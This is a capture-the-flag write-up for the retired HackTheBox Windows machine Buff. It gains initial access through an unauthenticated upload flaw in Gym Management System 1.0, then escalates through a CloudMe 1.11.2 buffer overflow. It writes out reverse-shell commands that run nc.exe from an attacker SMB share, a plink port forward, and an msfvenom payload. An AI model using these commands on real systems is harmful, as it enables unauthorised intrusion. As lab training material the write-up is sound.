Buff is a retired vulnerable Windows machine available from HackTheBox. The machine maker is egotisticalSW, thank you. It has an Easy difficulty with a rating of 3.6 out of 10.
Kali Linux is used to carry out the enumeration, exploitation and privilege escalation. The goal is to obtain root shell together with both user & root flags.
Exploitation Summary (tap to reveal)
- Vulnerability: Unauthenticated Remote Code Execution via Gym Management System 1.0
- Explanation: Gym Management System has a vulnerability of access to /upload.php without authentication. This vulnerability results in malicious code upload and remote code execution
- Vulnerability: CloudMe version 1.11.2 buffer overflow
- Explanation: CloudMe version 1.11.2 has a buffer overflow vulnerability. The vulnerability can be exploited to inject command execution
nmap -p- -A -T4 10.10.10.198
TCP 7680: pando-pub? TCP 8080: Apache httpd 2.4.43
2 ports are open: 7680 & 8080. I am not familiar with port 7680 as it’s my first time encounter this port. Google lookup shows that it could be used by WUDO (Windows Update Delivery Optimization). I connect to the port using netcat and enter some random commands but the connection would be closed without response. Not sure if this port is exploitable so I leave it for now.
Port 8080 is typically used for proxy or website. Connect to it using firebox shows that it’s a website:
It’s a website about fitness. Navigating the website using the links on the homepage quickly land on something interesting at the Contact page:
The contact page reveals that the site is using Gym Management Software 1.0. Let’s see if it’s vulnerable using searchsploit:
Yup, found an exploit available for this exact version. The exploit is easy to use. Simply run it with the URL:
python 48506.py http://10.10.10.198:8080/
Nice. We get in as user shaun. However, it’s not a full interactive shell. The exploit uploaded a small RCE php file and will execute the commands you entered.
Let’s get a full shell using nc.exe (available at /usr/share/windows-resources/binaries/nc.exe). I use impacket-smbserver to start a smb server to host the file:
Then start netcat listening to port 4005
nc -nvlp 4005
And then run the following command at the 48506.py exploit command prompt:
\\10.10.14.35\share\nc.exe 10.10.14.35 4005 -e cmd.exe
Great. Get the initial shell as shaun and grab the user flag at C:\Users\shaun\Desktop.
I perform basic enumeration and quickly find something interesting:
tree /f /a
tasklist | findStr CloudMe
There is an executable CloudMe_1112.exe under Downloads folder. Task list also shows that the service is running. This looks very interesting. Let’s check if it is vulnerable.
There are several exploits available. I tried all of them and only 48389.py was successful. And even for 48389.py exploit could fail at times.
NOTE: If you think you have the correct exploit but can’t get a reverse shell, the CloudMe service maybe in an unexploitable state and a machine reset would be needed.
Since the available exploit does not work all the time, I decided to build my own exploit using the technique I learnt from my OSCP journey. Turns out the buffer overflow exploitation is very similar to those found in OSCP. I will post my custom buffer overflow exploit when it’s ready.
Let’s go back to the exploit 48389.py. The CloudMe service is using port 8888. We can confirm port 8888 is open locally to the machine using command netstat -na:
We can use plink.exe to do a remote port forward to make the port 8888 available at our kali machine. plink.exe can be found at putty download page. So I download the program and place it to me smb server share.
When I try to establish the remote port forward, I have difficulty connecting through port 22. I believe the target machine has firewall blocking port 22. So I changed kali’s ssh service to port 4002 and the establish remote port forward using plink.exe:
\\10.10.14.35\share\plink.exe -l root 10.10.14.35 -P 4002 -R 8888:127.0.0.1:8888
Once remote port forward is established, we can access port 8888 at kali machine and all traffic will be forwarded to target machine’s port 8888.
Next we need to create a reverse shell payload and use that to modify the exploit 48389.py:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.35 LPORT=4000 EXITFUNC=thread -f python -v payload
The msfvenom command will generate a payload in python format. Replace the payload in 48389.py with the generated one.
Note: Although the target system is a x64 machine, I tried windows/x64/shell_reverse_tcp payload and it won’t work. Must use x86 payload.
Now start netcat listening to port 4000
nc -nvlp 4000
And then execute the exploit:
Awesome, gain shell as administrator and root flag is retrieved.
Again, if the exploit doesn’t give you reverse shell. Try to loop it many times. If still doesn’t work, you may need to reset the machine.